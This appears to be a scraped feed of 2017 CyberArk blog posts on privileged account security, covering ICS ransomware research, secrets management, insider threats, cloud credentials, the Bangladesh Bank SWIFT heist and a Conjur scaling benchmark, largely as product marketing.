Researchers have demonstrated proof-of-concept ransomware attacks against programmable logic controllers (PLC) used in many operational environments, including utilities. Unlike attacks against corporate networks, which can result in expenses and revenue loss, ICS attacks could shut down critical operational systems, damage or destroy physical equipment and threaten human safety.

Ransomware Economics

Ransomware so far has been a high-volume business, blocking access and encrypting files on corporate networks and even individual computers. Not everyone pays, but if the ransom is low enough, many do pay in order to save time or avoid the inconvenience of recovering files. Paying ransom is neither recommended by experts, nor is it a guarantee files will be decrypted.

These targets provide a relatively low return for attackers, but the high volume of targets and the ease of exploiting them make it worthwhile. Hollywood Presbyterian Medical Center, for example, paid $17,000 last year to regain access to its network.

The cost of an attack can be far greater than the ransom. A small city-owned utility in Michigan suffered a ransomware attack in April 2016 that effectively shut down its e-mail and phone systems. The article indicates it cost about $2 million to clean up after the attack. The utility had “to recover control of its communications systems, identify digital vulnerabilities and apply security upgrades that would prevent or severely limit the impact of another ransomware attack.”

Although utilities and hospitals are potentially high-value victims, in both of these cases corporate and administrative resources were targeted. Such attacks are serious, but less so than if critical control systems for water treatment or patient care had been at stake. So far, most successful attacks on critical infrastructure have been carried out by nation states, such as the 2015 breach of the Ukraine power grid. These exploits against critical infrastructure have not involved ransomware.

Evolution of the Ransomware Business Model

Researchers from the Georgia Institute of Technology demonstrated proof-of-concept ICS ransomware at the RSA 2017 Conference in February. As detailed in their paper, they attacked commercial PLCs in a simulated water treatment plant using the LogicLocker ransomware worm. This enabled researches to bypass weak authentication mechanisms ultimately, “locking legitimate users from easily recovering the PLC, and replacing the program with a logic bomb that begins to dangerously operate physical outputs threatening permanent damage and human harm if the ransom is not paid in time.” In the simulation, chlorine was dumped into the water supply.

Because of the premium on uptime in operational environments, PLCs often go for long periods without patching or fixing vulnerabilities. The researchers were able to find 1,846 vulnerable Internet-facing PLCs. “This only represents a small portion of the total potential attack surface,” they wrote, because attackers can easily target user devices on a corporate network and use compromised access to pivot to thousands more PLCs.

PLCs are attractive, high-value targets. The ransom in such a case would be commensurate with the risk. Such attacks, however, are sophisticated and require knowledge of the underlying physical process behind the control system. Such intel can be gained via reconnaissance, if an attacker breaches a network and remains undetected.

Maintaining Control of an Infrastructure

Traditional perimeter defenses such as antivirus are not enough to block ransomware. The Michigan utility cited believed it was protected, only to discover that its antivirus did not detect the malicious code. And unlike traditional malware, ransomware typically does not need administrative privileges to execute and take data hostage. Instead, it exploits basic read, write and edit permissions on files, which are needed by most every employee in an organization. Making matters worse, once the ransomware infects one machine on a network, it can easily spread through network drives or by stealing and reusing credentials on connected machines.

As we have reported, the most effective way to mitigate the risk of ransomware is to prevent unknown applications from gaining the read, write and edit permissions needed to encrypt files. This applies to ICS as well as to corporate networks. Proactive measures can be taken before a threat becomes reality. Implementing application whitelisting in top-hierarchy control computers such as Human-Machine Interfaces (HMIs) represents one of the most critical steps in securing an ICS network.

The CyberArk Endpoint Privilege Manager enables organizations to control and whitelist applications as well as remove local administrator rights from HMIs; it seamlessly elevates privileges based on an organization’s policy, as required by trusted (whitelisted) applications. This enables organizations to prevent unknown applications – including the latest variants of ransomware – from gaining the permissions needed to encrypt files on an infected machine.

To prevent ransomware (and other malware) from spreading between infected user devices and critical systems, organizations should isolate all access to their critical systems. The CyberArk Privileged Session Manager isolates remote user sessions on ICS targets, while allowing these sessions to be monitored and recorded. This helps block the spread of desktop malware and mitigates the risk of credential theft. By protecting privileged ICS accounts as critical assets, utilities can defend against having these assets held for ransom and endangering the health and welfare of their customers.

The CyberArk solution offers end-to-end privileged account protection for industrial control systems.  For more information, join us on April 27 for a webinar, “Best Practices for Preventing Ransomware in Industrial Control Systems Through Privileged Security Controls.”

 

]]>
7 Practices that Make Your Organization Vulnerable to Cyber Attacks https://www.cyberark.com/blog/13264-2/ Fri, 14 Apr 2017 13:41:20 +0000 https://www.cyberark.com/blog//

Today I read “How you can be the smartest cybersecurity expert in the room” on CIO.com. The author notes, “many CIOs and senior IT leaders are almost clueless about where to focus and how to start building next-gen security functions.” He references 20 CIS Critical Security Controls presented by the SANS Institute that organizations can implement to dramatically reduce risk. He acknowledges that list is too much for most busy IT teams, so he directs readers to focus on the top five CIS controls which can still lead to an “85 percent reduction in raw cyber security vulnerabilities.”

If you happen to be one of the smartest security people in the room, you already know that critical security control #5 is “Controlled Use of Administrative Privileges.” Where does this stand on your priority list?

Answer the questions below and consider whether or not your team has good or bad habits in place. If you answered yes to the questions below, your organization is susceptible to an attack. It’s time to implement controls around privileged credentials.

Learn more in The CISO View research report, “Rapid Risk Reduction: A 30-Day Sprint to Protect Privileged Credentials.”

]]>
Effective Secrets Management in DevOps: Towards a Trust-Forward Design https://www.cyberark.com/blog/effective-secrets-management-in-devops-towards-a-trust-forward-design/ Fri, 07 Apr 2017 14:56:00 +0000 https://cyberarkvx2.wpengine.com/blog/effective-secrets-management-in-devops-towards-a-trust-forward-design/  

Trust has been important in computing systems since the first business practices were put into place. Modern double entry accounting was invented in Genoa, Italy in 1340 as an error-detection mechanism. Chinese seals, also known as chops, from 300 BCE were an early technical mechanism to codify and confer trust among business actors. Seeing the red square seal of a business associate meant that you could trust a document’s veracity.

Today’s IT systems also capture trust relationships explicitly, from authentication and role information in LDAP to multi-tiered privileged access management systems. At Conjur we’ve observed our DevOps-heavy users manage trust as a first-class construct. In particular, trust needs to be applied system-wide, validated continuously, and reasoned about definitively. We’ve begun to develop a management language for that purpose — we call it a “trust-forward design”.

In our whitepaper Towards a Trust-Forward Design, we discuss a number of uses across which a trust-forward system can be implemented, from handling small tactical use cases to the underlying components of a trust-forward design.

Take for example the sharing of database passwords from enterprise systems to a temporary public cloud infrastructure. That involves a temporary granting of authority. The ability to audit that transfer of trust and being assured that the grant is automatically revoked when the job is complete is a real-life example of a trust-forward design goal. A mechanised, regular rotation of system passwords or keys is another case of the need for trust-forward design.

Motivations: DevOps, Cloud, APIs

Authentication and authorization have been part of computer systems since the first time-sharing machines. Those techniques like LDAP and RBAC are a good base to start from, but what makes them less capable to handle the needs of trust today? DevOps, cloud network as-a-service offerings, broader data and API integration, autonomous capabilities, and shorter development cycles are driving the need for new trust features in architectures.

DevOps’ strength comes from heavy use of automation to reduce friction in deployment. That automation puts stress on authentication and authorization systems that were not designed for it. A continuous integration process may run many times a day, deploying an application into testing or even production without further human intervention. Similarly, PaaS (platform as a service) enables a development team to instantiate a new application or a new version of an application with a few keystrokes, compressing a multi-step effort into a single-click. As such development cycles are shortened. Manual authorization steps are too slow to keep pace with a system that reacts to changes on the order of hundreds or tens of milliseconds. An advanced trust-forward system is designed to handle detailed delegation of authority to automatic processes.

Cloud network-based “as-a-service” companies have proliferated on the public internet exposing APIs for previously internally managed functions like telephony, payment processing, big data, security scanning, among many, many others. Even internal centrally managed as-a-service functions must document and audit trust for their users who are departmental light-years away. While cryptographic techniques are available for some protection of data at rest or in transit, ultimately data and processes must be uncloaked to be operated on.* A high degree of trust is needed to reap the benefits of these offerings. A trust-forward system helps to make these trust relationships explicit.

Further, modern applications’ value is often in integrating large, previously separate databases and APIs. The breadth of data sources and endpoints ultimately means better experiences for end users. For example, one can book an entire travel schedule from a single interface. With that integration power also comes a need for trust in sharing a potential itinerary or traveler profile. Access to disparate data and APIs crosses silo’d domains. A trust-forward system can get a handle on what is authorized and what happened in the past across a large number of identities.

Autonomous capabilities in the network as with DevOps (not to mention in physical space with mobile devices and IoT sensors) will need better security and trust relationship management at a very large scale and speed. And pace with new architectures like serverless or FaaS computing is accelerating. While initial needs may be small, starting a trust-forward project means that the complexity of future projects’ trust requirements can be considered.

In Towards a Trust-Forward Design, we start with the domain of secrets management, which is a prototype trust-forward system. We discuss business motivations from tactical to strategic, and close with an outline of what constitutes a trust-forward system and some optional capabilities. This is an initial declaration and we invite you to join us in elevating trust as a computable notion.

Please take a moment to download our free whitepaper.

—-

*Until researchers deliver practical homomorphic cryptography, the ability to operate on encrypted data without decryption, that is.

 

]]>
Your Greatest Threat Might Already Be Inside Your Network https://www.cyberark.com/blog/greatest-threat-might-already-inside-network/ Wed, 05 Apr 2017 14:24:38 +0000 https://www.cyberark.com/blog//

Insider activity—both malicious and simple error—accounts for a growing share of data breaches. Statistics are difficult to come by because requirements for reporting security incidents are not consistent across sectors. But some studies show they account for more than half of those breaches analyzed.

According to the Protenus Breach Barometer for February, a monthly analysis of reported breaches in the healthcare industry, 58 percent were related to insiders. This was divided about evenly between intentional wrongdoing and error. Outside hacking accounted for just 13 percent. The problem is not confined to any single industry. New York State Attorney General Eric T. Schneiderman reported in March that his office received a record number of data breach reports in 2016, nearly 1,300. Employee negligence and wrongdoing were blamed for 37 percent.

Because the insider doesn’t have to penetrate perimeter defenses, these breaches can be difficult to discover. According to the Protenus report, breaches reported in February were on average 478 days old at the time of discovery. In two instances, it was more than five years before breaches were discovered.

Dealing with the insider threat is difficult for any organization. But it is imperative, and you can guard against it with the right tools if know what to look for.

The Weakest Link

Organizations invest substantial resources in procuring, updating and securing the IT enterprise, but the human element is a wild card. “The weakest link for any organization is not its systems, but rather the human factor,” the latest Verizon Data Breach Digest concludes. The challenge of defending against the insider is compounded by the mistakes of well-meaning employees. “It is important to note that these incidents are not always the result of a malicious employee and often stem from carelessness and lack of awareness regarding sound IT protocol.”

Employees are on the network as legitimate users with legitimate credentials and user privileges, generally using the network in the ways that are intended. This can make it easy for a malicious insider to cover his or her tracks, and honest mistakes might not trigger alerts for the security staff.

Defending against this threat requires more than traditional perimeter defenses. Organizations need to be continually aware of who their privileged users are and what they can access, and the privileged accounts and credentials must be managed throughout their lifecycle. In one recently reported incident, a former systems administrator at a healthcare facility was charged with hacking the facility’s systems using administrative credentials that had not been revoked more than two years after he had resigned.

Self Defense

Defending against insider threats requires having visibility into your network and knowing what to look for.

From our experience in securing privileged accounts, we have identified behaviors and anomalies that help companies identify malicious or damaging behavior. In a recent blog we shared 10 commands that are frequently associated with risky behavior. As my colleague notes in the blog, “It’s always worth noting that no two situations are the same, so an action that may be harmless in one situation may create a major security issue in another.” But this list provides a starting point in monitoring your network for suspicious activity.

We also recently announced the latest release of the CyberArk Privileged Account Security Solution with advanced insider threat detection. A new data feed from CyberArk Privileged Session Manager to CyberArk Privileged Threat Analytics lets security teams receive customizable, prioritized alerts about possible high-risk privileged activity. You can watch suspicious sessions in progress and terminate malicious sessions, all from one platform.

Learn more about how CyberArk can help you manage privileged accounts and protect yourself against the growing insider threat.

]]>
Securing Assets and Applications in the Cloud https://www.cyberark.com/blog/securing-assets-applications-cloud/ Thu, 30 Mar 2017 17:33:06 +0000 https://www.cyberark.com/blog//

In our recent blog, Cloud Security: Who is Responsible for What?, we focused on the idea of shared responsibility in cloud environments; with IaaS/PaaS, the customer is responsible for everything above the hypervisor, while the cloud vendor takes responsibility for the infrastructure itself.

We also addressed how the public cloud vendors’ management consoles are a key weak point and consequently an attractive target for an attacker, often via a phishing attempt. As such, it’s important to lock down and secure privileged credentials in a digital vault to secure the management console. Now, I’d like to further address the enterprise’s responsibilities, specifically the functions above the hypervisor, including securing the privileged credentials used by applications and scripts accessing other applications and assets, such the enterprise’s customer database. Unfortunately these credentials are all too often hardcoded. This is a particularly troubling vulnerability as there can be a large number of hardcoded credentials used throughout cloud and hybrid environments.

Hard-coding and embedding credentials in the code or a script can initially make them easy to use – but this represents a significant vulnerability because attackers or malicious insiders can also easily access them, especially if the credentials are in clear text. But, even worse, when credentials are hard-coded or locally stored, they are nearly impossible to rotate, further making them a static and easy target for attackers.

The risk is real. As part of the DevOps process developers often share source code they’ve developed on code repositories such GitHub. While it’s part of the DevOps process, it’s an all too common example of how embedded passwords and credentials can become public if they’re hardcoded. Even if the code is only saved in the enterprise’s internal code repositories – those passwords and credentials can easily be accessed by other developers and used either inadvertently or maliciously. It also becomes difficult, if not impossible, to fully identify which applications or scripts are interacting with other applications and other enterprise assets.

In the past, these mistakes might not have been so risky, exploitable and damaging within an on-premises environment. However, in a cloud environment, because of the rapid pace of change, the ability to quickly scale, and the tools being used, these vulnerabilities are amplified and can pose unacceptable levels of risk.

To minimize risk and follow best practices, enterprises should avoid hardcoding passwords and credentials used by applications and scripts, and instead, secure credentials in a secure digital vault and rotate them according to policy. With this approach, just like with human users, enterprises can assign unique credentials to each application, code image or script, and then track, monitor and control access via a secure digital vault. Taking this approach, IT administrators will know which applications access resources such as a customer database. Also, when an application or script is retired, the administrator or script can simply turn off the credentials.

secure app to app credentials - best practiceA core business benefit of cloud is elasticity – the ability to easily and instantaneously scale up and scale down the number of compute instances, or virtual servers, to meet the needs of the business at a specific point in time. With on-demand cloud computing, the business only pays for the compute, storage and other resources they use. No human intervention is required. The cloud automation tools are either built-in as a capability of the public cloud vendor’s offerings, such as AWS Auto Scale, or as part of the orchestration and automation tools used with DevOps, such as Puppet, Chef, Ansible, etc.

On-demand computing in the cloud, enabled by the automation tools, is a huge business benefit, but it also presents challenges and new potential risks – when these new application instances are created and launched, they need privileges and credentials to access resources. The automation tools can provide the credentials, but these credentials also need to be secured. Consequently, when a new application instance is created, as the compute environment dynamically scales, a best practice is to immediately secure the permissions and credentials assigned to the new instance in the secure digital vault. This ensures that the credentials can immediately be monitored, managed, secured and rotated according to policy. When the compute instances are retired, the associated credentials can also be removed. This is achieved with integrations between the various automation tools and the secure digital vault.

Whether the enterprise is fully in the cloud with IaaS or PaaS or is migrating to the cloud, it is critical to ensure applications, scripts and other assets use secure passwords and privileged credentials to access other applications and assets in the cloud.

Increasingly, businesses leverage the CyberArk Application Identity Manager to store, monitor, track and rotate credentials and passwords according to policy in the secure digital vault for their cloud and elastic compute environments. Learn more here.

]]>
Machine Identity, And Why It’s A Thing https://www.cyberark.com/blog/machine-identity-and-why-its-a-thing/ Thu, 30 Mar 2017 15:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/machine-identity-and-why-its-a-thing/  

What is Machine Identity?

Maybe the first time you saw the term machine identity you thought of a science fiction concept like singularity, SkyNet, or “I, Robot”. The term “service account” is probably a more familiar concept. Machine identity is the application of familiar privileged access management (PAM) concepts including identity, authentication, RBAC, least-privilege, auditing, etc. to non-human network entities (processes, services, containers and hosts).

machine-identity-thumbnail.pngWhy is it important?

The goal of DevOps is to reliably increase the rate of change of applications and infrastructure. “Securely” is often added to that objective (hence DevSecOps). It is impossible to manage large quantities of virtual infrastructure (a cloud) without automation. Increasingly, IT automation is becoming less directed by human administrators, more autonomous. Privileged autonomous processes build and deploy applications, provision and configure infrastructure, and decide how to remediate problems. That is a lot of responsibility to entrust to non-human actors that are otherwise accountable to no one, that are making full-stack changes in production networks. Once auditors pick up on this fact, they will demand to see how these software robots are under control, as they demanded to see controls and proof of controls for human sysadmins. We need to securely manage processes running in a network by authenticating them and controlling their privileges.

What is the current practice?

Secrets management was a concept unfamiliar to many just a couple of years ago. Now most organizations at least attempt to control access to passwords and keys. The first step is removing those values from scripts and applications, storing them in secure vaults or key stores, and dynamically fetching them as needed. That is the onramp to machine identity. Access to secrets needs to be controlled, and many times it is a process that needs access. Currently many processes run as a conventional user identity – service accounts. Access to secrets is authenticated with conventional means like LDAP. But it soon becomes evident that for privileged software robots, more control is needed. In traditional / human-oriented scenarios, organizations deployed Privileged Access Management (PAM) solutions to address this challenge. However, human-oriented PAM solutions do not support the correct semantics and cannot scale to meet the dynamic nature of cloud requirements.

Is anybody doing this already?

As we might expect, Google is ahead of the curve with a full service identity management architecture to manage their cloud platform.

“Each service that runs on the infrastructure has an associated service account identity. A service is provided cryptographic credentials that it can use to prove its identity when making or receiving remote procedure calls (RPCs) to other services. These identities are used by clients to ensure that they are talking to the correct intended server, and by servers to limit access to methods and data to particular clients.”

Historically, classic PAM semantics granted or denied human access to non-human resources in relatively static IT environments. Now, in the cloud, non-human resources need controlled access to other non-human resources, with massive degrees of concurrency and scale. It’s no wonder that what worked before doesn’t work any more and new solutions must be developed.

PAM is dead, long live PAM

Let us not be too hasty to toss out concepts that have served us well. We can bring forward legacy PAM concepts and modernize them to work for us in the new DevSecOps cloud environments. This implies tackling use cases such as authenticating our Jenkins server, authorizing it to retrieve database passwords ONLY for development database servers and deploying ONLY to development repositories. All we really need is a way to let the process uniquely identify itself, and once its identity is established, grant access to the appropriate resources and deny access to all others. In the same vein, we can authorize our cloud automation engine to create uniquely identifiable hosts and processes, that are in turn authenticated and granted access to only the resources they need. This is possible today, but we need a new way implement the old concepts.

Here are just a few of the key capabilities that are crucial for a machine identity service that can secure your Cloud and DevOps infrastructure:

  • Application of identities to all sorts of non-human constructs including servers, VMs, containers, and CI jobs
  • Multi-factor machine authentication using attributes such as container ID, host API key, environment API, namespace API key, IP address / CIDR, and other attributes and, potentially custom, metadata
  • Assigning roles and performing roles-based access control (RBAC) for machine operations
  • Immutable audit logging, and human-consumable compliance reporting on machine activity
  • Encryption always, for data at rest and in motion.

 

 

]]>
SWIFT Security Concerns Resurface https://www.cyberark.com/blog/swift-security-concerns-resurface/ Mon, 27 Mar 2017 19:03:05 +0000 https://www.cyberark.com/blog//

The Bangladesh Bank heist has resurfaced as reports around a potential perpetrator make headlines. The recent focus may be on who and why, but lessons should be learned from what happened – it’s important to recognize common attack patterns and understand the role of privileged accounts.

As a recap: last year, cyber criminals embezzled money from the Bangladesh Central Bank. Using stolen privileged credentials, they moved laterally throughout the environment until they reached SWIFT, a financial services co-op that provides a secure network through which banks can send and receive monetary transactions. Using these privileged credentials, the criminals ultimately ordered a total of 35 transactions worth $951 million through the SWIFTNet systems. From there, approximately $81 million was transferred before a spelling error raised suspicion that led to the discovery of the breach. (Watch a short video for a brief overview of the attack path.) This was a high profile attack, but this was not the only bank as noted in a Reuters article.

Lessons learned from the breach and how you can protect your organization:

  • SWIFT Vulnerabilities: Many industry experts have pointed out vulnerabilities in SWIFT, noting that the system has likely not seen its last “bank robbery.” In this CSO article, Lavi Lazarovitz, CyberArk Labs cyber research team leader, explains that attackers are “getting really good at gaining that all important initial foothold inside networks by using attacks such as spear phishing.” With that foothold, they can gain local administrator privileges using, for example, an exploited Acrobat Reader vulnerability; when a user simply opens a malicious PDF file, the file runs malicious code that in turn acquires those elevated privileges.
  • Best Practices to Shore up Privileged Account Security: The Bangladesh Bank attack is yet another example of how attackers covet, seek out and exploit privileged accounts to achieve their mission. While this attack had a serious outcome and required advanced planning, the attack methods used were not very sophisticated. In a post-mortem analysis of the attack, CyberArk security researcher Asaf Hecht outlines five best practices that would have likely mitigated the breach.
  • How Banks Mitigate Risk: The threat is real and present. Many major banks recognize this and have taken steps to prioritize privilege in the wake of this breach. This American Banker article describes how a $26.9 billion-asset bank uses CyberArk to lock down privileged accounts and monitor and analyze privilege account activity.

Want to learn more? Attend a webcast on March 28, 2017 at 2 pm ET. CyberArk Labs will address the cyber security lessons learned related to the heist. Register here.

]]>
Forrester’s 5 Steps to Reinforce and Harden Application Security https://www.cyberark.com/blog/forresters-5-steps-to-reinforce-and-harden-application-security/ Fri, 24 Mar 2017 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/forresters-5-steps-to-reinforce-and-harden-application-security/  

Forrester recently published an updated research document entitled “Five Steps to Reinforce and Harden Application Security”. It lays out strategies and steps that Infrastructure and Operations teams can take to collaborate with Security personnel to weave an ever-stronger security fabric into their applications. We’re happy to make that report available to you today. Below, we discuss each of the five steps and how Conjur’s trust-forward platform can help organizations implement each of those steps.

Step 1: Remove Environment Inconsistencies and Create a Bill of Materials

The report cites evidence that over 50% of web servers have one or more misconfigurations – and that’s just one example of how individually configuring production servers can lead to security exposures. You should embrace the ethos of “configuration-as-code” to establish clear and proven best-configurations, and to minimize and catch any drift from those configurations.

Conjur integrates with many of the leading Configuration Management (CM) and Application Release Automation (ARA) solutions in the market including Puppet, Chef, Ansible, and SaltStack. In fact, our latest release introduces even stronger integration with Puppet than ever before including capabilities for establishing Node Identity, support for the Sensitive data type, and rich integration at the UI level to make it easier than ever to manage hosts maintained with Puppet.

Step 2: Monitor Changes by Controlling Access to Systems and Network Devices

This point is all about ensuring that you have strong identity-driven controls in place to protect yourself from outsider and insider threats, and using tight controls, such as Privileged Access Management (PAM) / Privileged Identity Management (PIM) tools, to ensure that only authenticated and authorized users are allowed to configure, deploy, and access production infrastructure.

Conjur doubles down on this point by providing industry-leading Secrets Management / PAM capabilities that are fully automated / integrable with your CM/ARA tools and your CI/CD pipeline. This approach significantly reduces your threat surface by eliminating humans from the chain of custody for production secrets.

Step 3: Assist in Intrusion Detection and Response

Intrusion is not an “if”, it’s a “when”. In spite of all your best efforts, it’s only a matter of time before you are compromised. It’s critical to pre-define “red flag” conditions and thresholds, including combinations of tripwires, and communicate those to your security team so that they can monitor for those conditions in real-time.

Conjur not only tracks each request for a secret or an authorization decision, but it also integrates with enterprise SIEM tools such as Splunk and ArcSight so that your security team and your Security Operations Center (SOC) have real-time visibility into what’s happening in your production environment. Conjur also provides a “kill-switch” capability that allows instantaneous shutdown of any access if it’s flagged. As with all things Conjur, this can be done manually or can be programmatically integrated into your incident response workflow for full automation and instant response.

Step 4: Log Everything Possible

Not much explanation needed here. A detailed audit trail is like a police officer’s backup / ankle weapon (you don’t need it till you need it badly). Detailed log information on every configuration change, authentication / authorization request and disposition, etc. is what your forensic team will use when digging into issues when (not if) they occur.

Conjur stores every transaction, even those that are requested but not approved, into an immutable database. The audit trail can be inspected at any time via APIs and command line tools. More importantly, Conjur provides rich, user-friendly reports that can be used by auditors and other non-technical users. These reports and views can be quickly filtered to narrow down to audit events during a particular timeframe, or for a particular role or resource.

Step 5: Create a Stack of Application Security Tools

Infrastructure and Security personnel need to have a diverse arsenal of tools for securing access to infrastructure and resources, performing dev-time and run-time security monitoring, and kick into incident response workflows as and when needed. Conjur provides a crucial piece of that security mosaic, and is completely programmable to ensure that it can fit seamlessly into a modern Secure DevOps, or SecDevOps, workflow.

 

]]>
Hunting Privileged Account Vulnerabilities with CyberArk Discovery & Audit (DNA) https://www.cyberark.com/blog/hunting-privileged-account-vulnerabilities-cyberark-discovery-audit-dna/ Fri, 24 Mar 2017 13:37:36 +0000 https://www.cyberark.com/blog//

It’s widely understood that cyber intruders and internal threat actors seek and exploit privileged accounts to help them achieve their goals. Security experts advise organizations to know what’s on their networks and know it better than any potential adversary.

But discovering and locking down all of the privileged accounts within your enterprise is easier said than done—especially when you consider there are typically 3-4x more privileged accounts than people in the average organization. These accounts “live” in hard-to-reach places within your network including applications, endpoints, servers, databases and the cloud.

Here are some challenges organizations encounter when working to simply understand—let alone protect—privileged accounts in their environments, for example:

On premises and some cloud environments:

  • There are often multiple accounts associated with one person and all of them have admin privileges.
  • Many passwords are set to never expire to mitigate the risk of an interruption or issue.
  • Many privileged accounts are mistakenly thought to be unused, but in reality, are used to log into systems regularly. Worse, it’s hard to pinpoint who is currently using them.
  • Service accounts with “recently created” passwords have actually been using the same passwords for years—sometimes even a decade.
  • It’s often difficult to locate hard-coded or embedded credentials stored within applications.

Specifically in cloud environments:

  • In AWS, Elastic Cloud Compute (EC2) instances can be accessed using both EC2 private keys and individual AWS accounts.
  • AWS root account credentials can be shared among multiple users, putting these highly sensitive credentials at an increased risk of loss or theft.
  • In the cloud environment, it can be challenging to manage roles-based and temporary access.

How can you determine where all of your privileged accounts are before your attackers do? Take the first step by scanning your network with our CyberArk Discovery & Audit™ (DNA) tool available at no charge. One scan will help you discover the privileged attack surface of your organization by identifying where privileged accounts exist on-premises and in the cloud, your current privileged account security risks, accounts with local administrator rights, and machines that are vulnerable to credential theft attacks (such as credential harvesting, Pass-the-Hash, Overpass-the-Hash and Golden Ticket). Last year, our CyberArk DNA tool scanned more than 21 million machines, helping organizations take the first step towards reducing privileged account risks.

Enterprises that fail to prioritize the security of their privileged accounts are at risk of becoming victims of a cyber attack—which can mean major damage to business, reputation and even the ability to operate. Take the first step toward securing your privileged account environment. Run the CyberArk DNA scan today.

]]>
Six Ways Attackers Try to Steal Privileged Credentials https://www.cyberark.com/blog/six-ways-attackers-try-steal-privileged-credentials/ Tue, 21 Mar 2017 15:59:19 +0000 https://www.cyberark.com/blog//

By now, most understand that privileged accounts play a leading role in the cyber attack lifecycle and also in advanced cyber attacks. Privileged accounts can access the most sensitive data in an organization, modify or completely disable security mechanisms, and stop, start, or modify the processes, systems, and apps that the business runs on.

Yet despite this knowledge, many organizations still share credentials directly with users, contractors, or third-party vendors.  They also store passwords in spreadsheets, only rotate credentials (at best) every 30 days, and give users—and service accounts—full admin rights on desktops and servers.

In a recent CyberArk webinar, my colleague Kevin Naglich noted that attackers recognize and take advantage of these poor security practices and routinely employ six common techniques to steal privileged credentials:

  1. Keystroke logging: Capturing everything that a user types, including their privileged passwords.
  2. Password cracking: Attempting to guess or “crack” credentials with brute force. Industry reports have revealed network administrators, database administrators and system administrators (in other words, people who should know better) are often the worst offenders (and therefore key targets in an attack) when it comes to having easy-to-crack passwords.
  3. Memory scraping: Looking into the memory on desktops, searching for credentials that may be saved in plain text, or in Windows environments, searching for particular hashes that can be used in pass-the-hash
  4. Password spreadsheets: Locating spreadsheets containing passwords. (Yes, this is still a thing. If you have one, get rid of it today.)
  5. Social engineering: Tricking a user into giving up their credentials directly.
  6. Hard-coded application credentials: Passwords or SSH keys that are within application codes, scripts, or configuration files that enable far-reaching access but are often unchanged for years at a time.

These techniques enable attackers to bypass and short-circuit controls. Think of it this way: privileged account security is THE control that affects all other controls. Even if an organization spends significant time and resources building strong password complexity rules and policies, it may find that all it takes is one keystroke logger to cause everything to fall apart. Consider Verizon’s 2016 Data Breach Investigations Report, which notes, “Prominent malware families […] are designed to capture keystrokes from an infected device. All those efforts to get users to use special characters, upper/lower case numbers and minimum lengths are nullified by this ubiquitous malware functionality.”

Another illustration of the depths of this problem can be seen in Mandiant’s M-Trends Report, which notes that the company’s Red Team, on average “is able to obtain access to domain administrator credentials within three days of gaining initial access to an environment.” While layered security is certainly critical (including proactive controls such as encryption and detection systems to identify malicious behavior), these systems can be largely ineffective without privileged account security in place as a safeguard.

An investment in privilege is not simply addressing one niche area of security, it is raising the security posture of the entire organization. That’s why it’s important to prioritize privilege account security, and approach it with a program mindset. Successful deployments typically define a strategy that follows a risk-based roadmap, establish a maturity model that accumulates quick wins to build momentum, and lay the groundwork for automating as many tasks as possible.

Want to learn more?  Watch a brief video about the three primary phases for successfully implementing the CyberArk Privileged Account Security Solution.

]]>
Secrets Management at Cloud Scale – A Benchmark https://www.cyberark.com/blog/secrets-management-at-cloud-scale-a-benchmark/ Fri, 17 Mar 2017 14:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/secrets-management-at-cloud-scale-a-benchmark/  

Secrets Management, a concept that overlaps somewhat with Privileged Access Management (PAM), has been a mainstay of enterprise security for a long time. However, the original use cases around which many of the incumbent tools in this space were built were human-centric — a canonical use case being say, a DBA needing privileged access to make some updates to a production database containing customer information. This human-centric approach, completely valid for the intended purpose, was designed to scale accordingly — hundreds or at the most thousands of administrative users of various stripes making interactive requests to manage servers, databases, and the like.

In the Cloud, Secrets Management has to scale at an entirely different level. With automated build, integration, and Configuration Management (CM) tools powering up VMs and micro-services, we are now required to contend with scale that is multiple orders of magnitude beyond those original use cases. In a previous blog post we shared that we had a customer that had to, from time to time, “reboot” their cloud for lack of a better phrase. This triggers tens of thousands of VMs being cycled simultaneously, resulting in the need to request over 4 million secrets per minute!

We don’t think this is unusual for organizations moving to the cloud. Even small and mid-sized institutions are delivering customer and consumer facing applications in the healthcare, financial services, media, entertainment, and other industries that will need this type of scale.

Unfortunately, doing a web search for any combination of “secrets management” and “scale” or “scalability” doesn’t yield great results. The topic is either confused or conflated with other considerations. While those other things are related and not unimportant, the crucial point around being able to deliver secrets management at cloud scale seems to get lost in the noise. Sometimes it’s discussed in the context of administrative scale (a not unimportant issue that we will discuss in a future blog post) — that is, the ability to manage key and secret distribution, user administration, and the like across a large and distributed set of humans. Other times it’s treated as a high-availability conversation (again, important but not the same thing). Sometimes it’s just left as an exercise in scaling the back-end you use for secrets management.

Picture1.png

At the request of several of our prospects, we decided to run a benchmark of our performance at massive scale, and we wanted to share the results with you.

Environment:

To demonstrate the scalability of the Conjur platform, we created an AWS Auto Scaling Group (ASG) containing Conjur Followers (Learn more about Conjur’s Master / Follower architecture here). The ASG was created from the Conjur CloudFormation template and modified to use an AMI that contains a Conjur container configured as a follower. The ASG is configured to use m4.large instances, each of which has 2 vCPUs. It has a scaling policy that will scale out when the average CPU utilization exceeds 50%. When it hits that threshold, it will add a new instance of a Conjur Follower to the cluster.

Load Test Execution:

The load generator ran in 30 second bursts, issuing Conjur API requests for the values of 20 variables in a single batch. We started the test at 8 requests per second (fetching 20 variables in each request), and scaled it up to 128 per second. It generated load at each rate for 10 minutes.

Results:

conjur-scaling.jpg

The grey line is requests/sec, the ever-increasing load on the system, and you can see how it relates to request latency (the orange line). Remember that each “hit” on the system is actually a batch lookup of 20 secrets, so by the end of the test (when we’re running 128 req/sec) we’re actually looking up 2,560 secrets each second, and applying full levels of authentication, authorization, and auditing to each lookup. In other words, they’re expensive operations! That’s a sustained load of 153,600 secrets looked up each minute, or 9.2M each hour. And that’s not even the ceiling – not even close. Read on…

The important part is that as the Amazon ASG adds more Conjur Follower nodes to the cluster to handle the increasing load, but the request latency always stays predictable, hovering around 100ms.

The blue line shows the CPU utilization of the whole cluster (as an average). The red line shows the size of the cluster group, and it steps up whenever AWS determines that the group is getting too loaded for the current traffic levels. You can see that whenever the red line steps up (when a node is added), the result is that both the latency and CPU utilization average drop thanks to the extra horsepower. Then, as the load increases, they track back up.

Takeaway:

Conjur can handle ever-increasing load, but its latency never falters. And this is while performing expensive authentication, authorization, and audit functions on each operation. You can scale it to your heart’s content, and it remains a predictably-behaving system. We only stopped the test because we’d proven our point, but theoretically we could keep going indefinitely.

There are many aspects to properly architecting and deploying an enterprise-grade cloud security architecture. Scale and throughput, without sacrificing audit and security requirements, should be one of the key considerations when you design yours.

 

